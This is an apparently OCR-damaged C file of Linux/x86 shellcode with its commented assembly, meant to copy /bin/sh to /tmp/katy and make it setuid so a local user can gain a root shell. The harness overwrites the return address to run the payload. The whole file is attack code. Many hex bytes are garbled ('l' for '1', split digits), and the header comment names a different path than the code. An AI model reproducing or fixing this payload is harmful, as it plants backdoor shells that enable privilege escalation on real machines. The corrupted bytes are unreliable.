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<pre> 

/* 

* Linux/x86 

* /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork() 
*/ 

#include &quot ; stdio . h&quot ; 


char shellcode[] = 

&quot ; \xeb\x5e\x5f \x31\xc0\x88\x47\x07\x88\x47\x0f \x88\x47\xl9\x89\x7f&quot ; 
&quot ; \xla\x8d\x77\x08\x89\x77\xle\x31\xf 6\x8d\x77\xl0\x89\x77\x22\x89&quot ; 
&quot ; \x47\x26\x89\xf b\x8d\x4f \xla\x8d\x57\x26\x31\xc0\xb0\x02\xcd\x80&quot ; 
&quot ; \x31\xf 6\x39\xc6\x75\x06\xb0\x0b\xcd\x80\xeb\xld\x31\xd2\x31\xc0&quot ; 
&quot ; \x31\xdb\x4b\x8d\x4f \x26\xb0\x07\xcd\x80\x31\xc0\x8d\x5f \xl0\x31&quot ; 
&quot ; \xc9\x66\xb9\x6d\x09\xb0\x0f \xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80&quot ; 
&quot ; \xe8\x9d\xf f \xf f \xf f /bin/cp8/bin/sh8/tmp/katy&quot ; ; 

main() { 

int *ret; 

ret=(int *)&amp;ret +2; 

printf (&quot ;Shellcode lenght=%d\n&quot ; , strlen(shellcode) ) ; 

(*ret) = (int)shellcode; 

} 


/* Code */ 
/* 


asm (&quot ; 


jmp 0x5e 
popl %edi 
xorl %eax,%eax 
movb %al, 0x7(%edi) 
movb %al, 0xf (%edi) 

movb %al, 0xl9(%edi) 
movl %edi, 0xla(%edi) 
leal 0x8(%edi),%esi 
movl %esi, 0xle(%edi) 
xorl %esi,%esi 
leal 0xl0(%edi),%esi 
movl %esi, 0x22(%edi) 
movl %eax, 0x26(%edi) 
movl %edi,%ebx 
leal 0xla(%edi) ,%ecx 
leal 0x26(%edi),%edx 
xorl %eax,%eax 
movb $0x2, %al 

int $0x80 

xorl %esi,%esi 
cmpl %eax,%esi 
jne 0x6 

movb $0xb,%al 

int $0x80 



jmp 0xld 
xorl %edx,%edx 
xorl %eax,%eax 
xorl %ebx,%ebx 
dec %ebx 

leal 0x26(%edi),%ecx 
movb $0x7, %al 

int $0x80 

xorl %eax,%eax 
leal 0xl0(%edi),%ebx 
xorl %ecx,%ecx 
movw $0x96d, %cx 
movb $0xf,%al 

int $0x80 

xorl %eax,%eax 
inc %eax 

xorl %ebx,%ebx 
int $0x80 

call -0x63 

. ascii \&quot ; /bin/cp8/bin/sh8/tmp/katy\&quot ; 

&quot ; ) ; 

*/ 
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